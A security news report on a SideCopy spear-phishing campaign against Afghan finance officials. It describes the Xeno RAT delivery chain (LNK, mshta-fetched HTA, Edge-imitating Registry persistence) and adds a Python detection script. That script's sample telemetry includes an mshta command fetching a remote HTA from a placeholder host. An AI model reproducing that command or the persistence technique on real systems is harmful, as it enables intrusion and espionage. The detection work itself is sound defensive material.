Cybersecurity researchers have disclosed details of a targeted spear-phishing campaign believed to be linked to the Pakistan-aligned threat group SideCopy, targeting Afghanistan’s Ministry of Finance and related government institutions with an open-source remote access trojan known as Xeno RAT. According to findings released by Seqrite Labs, the operation focused on government entities including provincial revenue and finance directorates, Pashto-speaking officials, and employees working at the provincial level. Researchers tracking the activity have assigned the campaign the name Operation XENOFISCAL, identifying it as part of a broader pattern of cyber espionage activity affecting South Asian government organizations.
According to technical analysis published by Seqrite Labs researcher Dixit Panchal, the campaign begins with a spear-phishing technique involving a ZIP archive that contains a malicious Windows Shortcut file, commonly referred to as an LNK file. The lure file reportedly carries a carefully designed Pashto-language filename, a choice researchers believe reflects a deliberate attempt to align with Afghanistan’s government communication environment, where Pashto remains one of the dominant languages. Security analysts noted that the use of a localized language demonstrates familiarity with the target ecosystem and increases the likelihood that recipients will interact with the malicious file. Researchers stated that the file executes through “mshta.exe” to retrieve a remote HTML Application from a compromised Afghan educational domain, eventually launching obfuscated JavaScript code directly in memory to avoid detection.
The attack chain reportedly establishes persistence on infected systems by creating Windows Registry entries designed to imitate Microsoft Edge, while simultaneously deploying Xeno RAT version 1.8.7 alongside a decoy document intended to distract victims. Security researchers explained that the malware is delivered through a DLL-based loader, enabling attackers to maintain stealth while activating remote access capabilities. Once active, Xeno RAT connects to a remote command server over TCP, allowing threat actors to remotely issue instructions and control compromised systems. The malware is reportedly capable of executing external DLL modules, transferring files, launching itself through scheduled tasks, collecting antivirus details, supporting SOCKS5 proxy tunneling, logging keystrokes, monitoring clipboard activity, capturing screenshots, and accessing webcam and microphone functions. Researchers also noted that the malware can remove its persistence mechanisms and uninstall itself to limit forensic traces if necessary.
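As an added illustration of how a defender might surface two of the chain stages described above (mshta.exe fetching a remote HTA, and Registry persistence branded as Microsoft Edge), the following Python triage script runs two simple rules over constructed endpoint telemetry. It is not code from Seqrite's report; the event shape, the use of the HKCU Run key as the persistence location, and all sample values are assumptions.

```python
import re

# Constructed sample telemetry (assumption: a simplified Sysmon-like event shape).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://compromised-edu-site.invalid/update.hta",
     "parent": r"C:\Windows\explorer.exe"},
    # Edge-branded Run value pointing at a user-writable path (suspicious).
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "MicrosoftEdgeUpdate", "data": r"C:\Users\Public\edge\msedge.exe"},
    # Edge-branded Run value pointing into the real install directory (benign).
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "MicrosoftEdgeAutoLaunch",
     "data": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window"},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Directories where a genuine Edge binary lives (lower-cased, trailing separator kept).
LEGIT_EDGE_DIRS = ("c:\\program files\\microsoft\\edge\\application\\",
                   "c:\\program files (x86)\\microsoft\\edge\\application\\")


def flag_remote_mshta(ev):
    """mshta.exe started with a URL on its command line: the LNK -> mshta -> remote HTA step."""
    if ev.get("type") != "process" or not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    if not REMOTE_URL.search(ev["cmdline"]):
        return None
    return f"mshta.exe launched with a remote URL (parent: {ev['parent']})"


def flag_fake_edge_persistence(ev):
    """Run-key value named after Edge whose target lies outside Edge's install directory."""
    if ev.get("type") != "registry" or not ev["key"].lower().endswith("\\currentversion\\run"):
        return None
    if "edge" not in ev["value"].lower():
        return None
    target = ev["data"].lower().strip('"')
    if target.startswith(LEGIT_EDGE_DIRS):
        return None
    return f"Edge-branded Run entry '{ev['value']}' points outside Edge install dir: {ev['data']}"


def scan(events):
    """Apply both rules to every event and return the list of alert strings."""
    hits = []
    for ev in events:
        for rule in (flag_remote_mshta, flag_fake_edge_persistence):
            msg = rule(ev)
            if msg:
                hits.append(msg)
    return hits


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On the constructed sample the script raises two alerts and correctly ignores the Run entry that points into the genuine Edge installation directory.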
Security analysts believe the latest campaign aligns with previous activity attributed to SideCopy, a threat actor associated with the broader Transparent Tribe, also known as APT36. The group has previously been linked to cyber operations involving several malware families used to collect sensitive information from compromised devices. In April 2025, researchers attributed a separate wave of attacks targeting organizations in India to SideCopy, involving malware such as Xeno RAT, Spark RAT, and CurlBack RAT. The disclosure also follows reports of another suspected Transparent Tribe campaign targeting Indian military infrastructure through weaponized Linux desktop files delivered using defense-related contract lures and WhatsApp-based social engineering. Researchers tracking that operation stated that the attack chain relied on staged payload delivery and deployment of a Golang-based implant identified as DeskRAT, reinforcing concerns around the growing sophistication of cyber espionage campaigns targeting South Asian institutions.